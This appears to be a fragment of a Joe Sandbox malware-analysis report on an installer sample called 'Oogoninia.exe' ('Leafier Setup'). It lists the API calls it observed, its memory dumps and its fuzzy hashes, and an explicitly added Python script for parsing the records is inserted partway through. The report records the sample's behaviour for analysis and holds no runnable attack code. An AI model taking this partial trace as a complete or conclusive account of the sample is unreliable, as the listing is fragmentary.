• Opcode Fuzzy Hash: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
• Instruction Fuzzy Hash: D7214FB1904704ABCB319F78DD48B5BBBF8AF41714F048A29EB96B22E0D734E944CB55
APIs
• GlobalFree.KERNEL32(00000000), ref: 1000234A
  • Part of subcall function 10001224: lstrcpynA.KERNEL32(00000000,?,100012CF,-1000404B,100011AB,-000000A0), ref: 10001234
• GlobalAlloc.KERNEL32(00000040,?), ref: 100022C3
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 100022D8
• GlobalAlloc.KERNEL32(00000040,00000010), ref: 100022E7
• CLSIDFromString.OLE32(00000000,00000000), ref: 100022F4
• GlobalFree.KERNEL32(00000000), ref: 100022FB
Memory Dump Source
• Source File: 00000000.00000002.1196297422.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.1196258164.0000000010000000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000000.00000002.1196329175.0000000010003000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000000.00000002.1196354573.0000000010005000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_Oogoninia.jbxd
Similarity
• API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
• String ID:
• API String ID: 3730416702-0
• Opcode ID: 8ca201b8c9dcbb45ad50e4cb45e4e1ae2e8a5d70f393ea2d6c63899163ff979d
• Instruction ID: bfa8c22ebd78897ea4dc14f883c746723b208fa17a75ef0c69fbb79ff87ab60c
• Opcode Fuzzy Hash: 8ca201b8c9dcbb45ad50e4cb45e4e1ae2e8a5d70f393ea2d6c63899163ff979d
• Instruction Fuzzy Hash: B541ABB1108311EFF320DFA48884B5BB7F8FF443D1F218529F946D61A9DB34AA448B61
APIs
  • Part of subcall function 10001215: GlobalAlloc.KERNELBASE(00000040,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D
• GlobalFree.KERNEL32(?), ref: 100024B5
• GlobalFree.KERNEL32(00000000), ref: 100024EF
Memory Dump Source
• Source File: 00000000.00000002.1196297422.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.1196258164.0000000010000000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000000.00000002.1196329175.0000000010003000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000000.00000002.1196354573.0000000010005000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_Oogoninia.jbxd
Similarity
• API ID: Global$Free$Alloc
• String ID:
• API String ID: 1780285237-0
• Opcode ID: 8ed12168559ed504bf2d16f5614b25cf9b7800a5843296302d7a865f42518c80
• Instruction ID: 4e6b36a645f71e2aed4a85f2c36ff1861f2741140ba068ae73f9b0a79c1593cf
• Opcode Fuzzy Hash: 8ed12168559ed504bf2d16f5614b25cf9b7800a5843296302d7a865f42518c80
• Instruction Fuzzy Hash: EA319CB1504250EFF322CF64CCC4C6B7BBDEB852D4B124529FA4193168CB31AC94DB62
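The records above and below follow one layout: each bullet under "APIs" is a call site (API name, module, the argument values observed, and the "ref" address of the call, with callee call sites marked "Part of subcall function"), "Memory Dump Source" names the dump and its base address ("Offset") that those ref addresses belong to, and "Similarity" carries the API/String IDs and fuzzy hashes used to cluster functions across samples. The Python below is an added example, not part of this report or of Joe Sandbox's tooling: it parses records of this shape into structures, builds an API-to-call-site index, and maps a ref address back to the dump it most plausibly came from. The sample text is constructed from lines on this page; the record boundary rule and the base-only address lookup are assumptions, since the report states each dump's base but not its size.

```python
"""Parse Joe Sandbox per-function records (APIs / Memory Dump Source /
Similarity) into queryable structures. Added example; record boundaries
and the base-only address lookup are inferred from the report layout."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed sample in the shape of two records from this report.
SAMPLE = """\
APIs
• GlobalFree.KERNEL32(00000000), ref: 1000234A
  • Part of subcall function 10001224: lstrcpynA.KERNEL32(00000000,?,100012CF,-1000404B,100011AB,-000000A0), ref: 10001234
• GlobalAlloc.KERNEL32(00000040,?), ref: 100022C3
• CLSIDFromString.OLE32(00000000,00000000), ref: 100022F4
Memory Dump Source
• Source File: 00000000.00000002.1196297422.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
Similarity
• API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
• String ID:
• API String ID: 3730416702-0
APIs
• lstrcatA.KERNEL32(0079DD20,0040306B,0040306B,0079DD20,00000000,0078FCF8,766B23A0), ref: 00405015
• SetWindowTextA.USER32(0079DD20,0079DD20), ref: 00405027
• SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040504D
Memory Dump Source
• Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: MessageSend$lstrlen$TextWindowlstrcat
• String ID:
• API String ID: 2531174081-0
"""

API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+): )?"
    r"(?P<name>\w+)\.(?P<mod>\w+)\((?P<args>.*)\), ref: (?P<ref>[0-9A-Fa-f]+)\s*$")
SOURCE_RE = re.compile(r"Source File: (?P<file>\S+), Offset: (?P<base>[0-9A-Fa-f]+)")
FIELD_RE = re.compile(r"^\s*•\s*(?P<key>[A-Za-z ]+?):\s?(?P<val>.*)$")
HEADINGS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}

@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: int                          # call-site address from "ref:"
    subcall_of: Optional[int] = None  # set for "Part of subcall function X" lines

@dataclass
class FunctionRecord:
    apis: List[ApiCall] = field(default_factory=list)
    source_file: Optional[str] = None
    base: Optional[int] = None        # "Offset:" of the dump the refs belong to
    similarity: Dict[str, str] = field(default_factory=dict)

def parse_records(text: str) -> List[FunctionRecord]:
    records: List[FunctionRecord] = []
    cur, section = FunctionRecord(), None
    for raw in text.splitlines():
        line = raw.strip()
        if line in HEADINGS:
            # Assumption: a record closes with its Similarity block, so the
            # next APIs or Strings heading opens a new function record.
            if line in ("APIs", "Strings") and cur.similarity:
                records.append(cur)
                cur = FunctionRecord()
            section = line
            continue
        if section == "APIs" and (m := API_RE.match(raw)):
            cur.apis.append(ApiCall(
                name=m["name"], module=m["mod"],
                args=[a for a in m["args"].split(",") if a],
                ref=int(m["ref"], 16),
                subcall_of=int(m["sub"], 16) if m["sub"] else None))
        elif section == "Memory Dump Source" and (m := SOURCE_RE.search(line)):
            cur.source_file, cur.base = m["file"], int(m["base"], 16)
        elif section == "Similarity" and (m := FIELD_RE.match(raw)):
            cur.similarity[m["key"]] = m["val"].strip()
    if cur.apis or cur.source_file or cur.similarity:
        records.append(cur)
    return records

def api_index(records: List[FunctionRecord]) -> Dict[str, List[int]]:
    """API name -> every call-site address seen across all records."""
    idx: Dict[str, List[int]] = {}
    for rec in records:
        for call in rec.apis:
            idx.setdefault(call.name, []).append(call.ref)
    return idx

def dump_for_ref(records: List[FunctionRecord], ref: int) -> Optional[str]:
    """Dump whose base is the highest one at or below ref. The report gives
    each dump's base but not its size, so this is a heuristic."""
    hits = [r for r in records if r.base is not None and r.base <= ref]
    return max(hits, key=lambda r: r.base).source_file if hits else None

if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for name, refs in sorted(api_index(recs).items()):
        print(f"{name:18s}" + ", ".join(f"{r:08X}" for r in refs))
    print("1000234A is in", dump_for_ref(recs, 0x1000234A))
```

Feed the whole Executed Functions listing to parse_records and the index gives every call site of, say, SendMessageA or CLSIDFromString in one place, while dump_for_ref tells you which .sdmp to load to look at the bytes around a given ref; treat the latter as a pointer to check in the dump, not as proof the address belongs to that module.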
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • lstrlenA.KERNEL32(0079DD20,00000000,0078FCF8,766B23A0,?,?,?,?,?,?,?,?,?,0040306B,00000000,?), ref: 00404FF2
                                                                                                                                                                                    • lstrlenA.KERNEL32(0040306B,0079DD20,00000000,0078FCF8,766B23A0,?,?,?,?,?,?,?,?,?,0040306B,00000000), ref: 00405002
                                                                                                                                                                                    • lstrcatA.KERNEL32(0079DD20,0040306B,0040306B,0079DD20,00000000,0078FCF8,766B23A0), ref: 00405015
                                                                                                                                                                                    • SetWindowTextA.USER32(0079DD20,0079DD20), ref: 00405027
                                                                                                                                                                                    • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040504D
                                                                                                                                                                                    • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405067
                                                                                                                                                                                    • SendMessageA.USER32(?,00001013,?,00000000), ref: 00405075
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1191289974.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191407654.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
Similarity
• API ID: MessageSend$lstrlen$TextWindowlstrcat
• String ID:
• API String ID: 2531174081-0
APIs
• SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 0040489F
• GetMessagePos.USER32 ref: 004048A7
• ScreenToClient.USER32(?,?), ref: 004048C1
• SendMessageA.USER32(?,00001111,00000000,?), ref: 004048D3
• SendMessageA.USER32(?,0000110C,00000000,?), ref: 004048F9
Strings
Memory Dump Source
• Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
Similarity
• API ID: Message$Send$ClientScreen
• String ID: f
• API String ID: 41195575-1993550816
APIs
• SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C2E
• MulDiv.KERNEL32(00099554,00000064,0009AAE8), ref: 00402C59
• wsprintfA.USER32 ref: 00402C69
• SetWindowTextA.USER32(?,?), ref: 00402C79
• SetDlgItemTextA.USER32(?,00000406,?), ref: 00402C8B
Strings
• verifying installer: %d%%, xrefs: 00402C63
Memory Dump Source
• Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
Similarity
• API ID: Text$ItemTimerWindowwsprintf
• String ID: verifying installer: %d%%
• API String ID: 1451636040-82062127
APIs
• GlobalAlloc.KERNEL32(00000040,00030000,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040279D
• GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 004027B9
• GlobalFree.KERNEL32(?), ref: 004027F2
• GlobalFree.KERNEL32(00000000), ref: 00402805
• CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 0040281D
• DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402831
Memory Dump Source
• Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
Similarity
• API ID: Global$AllocFree$CloseDeleteFileHandle
• String ID:
• API String ID: 2667972263-0
APIs
• lstrlenA.KERNEL32(0079E540,0079E540,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404695,000000DF,00000000,00000400,?), ref: 00404818
• wsprintfA.USER32 ref: 00404820
• SetDlgItemTextA.USER32(?,0079E540), ref: 00404833
Strings
Memory Dump Source
• Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
Similarity
• API ID: ItemTextlstrlenwsprintf
• String ID: %u.%u%s%s$@y
• API String ID: 3540041739-3020698753
• Opcode ID: ca56fcb4ff96a92767a948c37e1cdc386e941f7d7930a18b2193be96cb950031
• Instruction ID: 9c2068d9445a5b6f252536eabbf1c91049bb0fb02782bdd1491d607ad1f2c465
• Opcode Fuzzy Hash: ca56fcb4ff96a92767a948c37e1cdc386e941f7d7930a18b2193be96cb950031
• Instruction Fuzzy Hash: E711E773A041283BDB0065699C45EAF3698DB86334F254237FA25F31D1EA78CC1182E9
APIs
• GetDlgItem.USER32(?), ref: 00401D3F
• GetClientRect.USER32(00000000,?), ref: 00401D4C
• LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D6D
• SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D7B
• DeleteObject.GDI32(00000000), ref: 00401D8A
Memory Dump Source
• Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
Similarity
• API ID: ClientDeleteImageItemLoadMessageObjectRectSend
• String ID:
• API String ID: 1849352358-0
• Opcode ID: 978bdc3de84591c5b34c529a30ac5b154b9d899f544855d7d9a99db957ba7817
• Instruction ID: b8adc288744d91ba617009adb3e02bef21eb0d6e3f954176feac09388768b409
• Opcode Fuzzy Hash: 978bdc3de84591c5b34c529a30ac5b154b9d899f544855d7d9a99db957ba7817
• Instruction Fuzzy Hash: 45F0FFB2A04119BFE701EBA4DE88DAFB7BCEB44301B104466F601F2191C7749D018B79
APIs
• SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C74
• SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C8C
Strings
Memory Dump Source
• Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
Similarity
• API ID: MessageSend$Timeout
• String ID: !
• API String ID: 1777923405-2657877971
• Opcode ID: 182774ec21bf90fa89628062bdc31045ec8b3e2a1ef169624933301e1dab061d
• Instruction ID: 44e87a32571ed3235eb7b96b36fbe9a42cad9ebb5189372230b031547819aef2
• Opcode Fuzzy Hash: 182774ec21bf90fa89628062bdc31045ec8b3e2a1ef169624933301e1dab061d
• Instruction Fuzzy Hash: ED21A271E44208BEEB15EFA4DA46AED7FB1EF84314F24403EF101B61D1DA788640DB28
APIs
• SetWindowTextA.USER32(00000000,Leafier Setup), ref: 00403A7D
Strings
Memory Dump Source
• Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
Similarity
• API ID: TextWindow
• String ID: "C:\Users\user\Desktop\Oogoninia.exe"$1033$Leafier Setup
• API String ID: 530164218-3960258653
• Opcode ID: 6c45f722f9a7ae4fb793d3ca626f1132432b1c01d3db27434527fc1e6ec0313f
• Instruction ID: 535a85070ebab7a8ba56d21747a6201fabbada84c5c70f31dda2a066eb9b82e2
• Opcode Fuzzy Hash: 6c45f722f9a7ae4fb793d3ca626f1132432b1c01d3db27434527fc1e6ec0313f
• Instruction Fuzzy Hash: D1110E35B002019FD7209F15DC80A377B6CEBCA355728823BE841A73A0D73D9D028BA8
APIs
• lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040316D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403370), ref: 00405818
• CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040316D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403370), ref: 00405821
• lstrcatA.KERNEL32(?,00409014), ref: 00405832
Strings
• C:\Users\user\AppData\Local\Temp\, xrefs: 00405812
Memory Dump Source
• Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1191289974.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191407654.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CharPrevlstrcatlstrlen
                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                    • API String ID: 2659869361-3355392842
                                                                                                                                                                                    • Opcode ID: 39623dee3265ed167cf4eb0d952b1efefe5673d98ca6e2622bb109ae9f6b3ea7
                                                                                                                                                                                    • Instruction ID: 0a665bc2143073433464dc8fd220d9afc6aaff2f2e3703ee86bb110f897cf778
                                                                                                                                                                                    • Opcode Fuzzy Hash: 39623dee3265ed167cf4eb0d952b1efefe5673d98ca6e2622bb109ae9f6b3ea7
                                                                                                                                                                                    • Instruction Fuzzy Hash: DDD0A9A3606930AAE30222158C09EDF2A58CF12340B048037F200B22A2C63C8E418BFE
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CharNextA.USER32(?,?,C:\,?,00405917,C:\,C:\,766B3410,?,C:\Users\user\AppData\Local\Temp\,00405662,?,766B3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058B9
                                                                                                                                                                                    • CharNextA.USER32(00000000), ref: 004058BE
                                                                                                                                                                                    • CharNextA.USER32(00000000), ref: 004058D2
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1191289974.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191407654.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CharNext
                                                                                                                                                                                    • String ID: C:\
                                                                                                                                                                                    • API String ID: 3213498283-3404278061
                                                                                                                                                                                    • Opcode ID: b52e97735ebcacdda31b679af32a6ceda5c9d10ed76b2852ac30fc4ce6ba53e1
                                                                                                                                                                                    • Instruction ID: e63bfe958a3d000d539ac339b3831bddf0e80049928d73a3bf58654b49e63fc9
                                                                                                                                                                                    • Opcode Fuzzy Hash: b52e97735ebcacdda31b679af32a6ceda5c9d10ed76b2852ac30fc4ce6ba53e1
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5CF0F653904F552AFB3272280C40B775B88DB5A361F14C077EE40B62C1D27C4C609FAA
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • DestroyWindow.USER32(00000000,00000000,00402E76,00000001), ref: 00402CA9
                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00402CC7
                                                                                                                                                                                    • CreateDialogParamA.USER32(0000006F,00000000,00402C13,00000000), ref: 00402CE4
                                                                                                                                                                                    • ShowWindow.USER32(00000000,00000005), ref: 00402CF2
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1191289974.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191407654.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2102729457-0
                                                                                                                                                                                    • Opcode ID: e47f6d303f75ebd17c716a95d6a18f35b6dc664df62f34b119683803831f88dc
                                                                                                                                                                                    • Instruction ID: 9ab3963fa07bdcc1a95f8d1ddaaeb6e773ff80e4731962a5f71ef67b0361f4de
                                                                                                                                                                                    • Opcode Fuzzy Hash: e47f6d303f75ebd17c716a95d6a18f35b6dc664df62f34b119683803831f88dc
                                                                                                                                                                                    • Instruction Fuzzy Hash: B9F03030809521AFD6125B24FF8EDDE7A64AB41701B114477F414B11E4D7781885CBD9
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • IsWindowVisible.USER32(?), ref: 00404F5C
                                                                                                                                                                                    • CallWindowProcA.USER32(?,?,?,?), ref: 00404FAD
                                                                                                                                                                                      • Part of subcall function 00403FD1: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00403FE3
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1191289974.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191407654.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
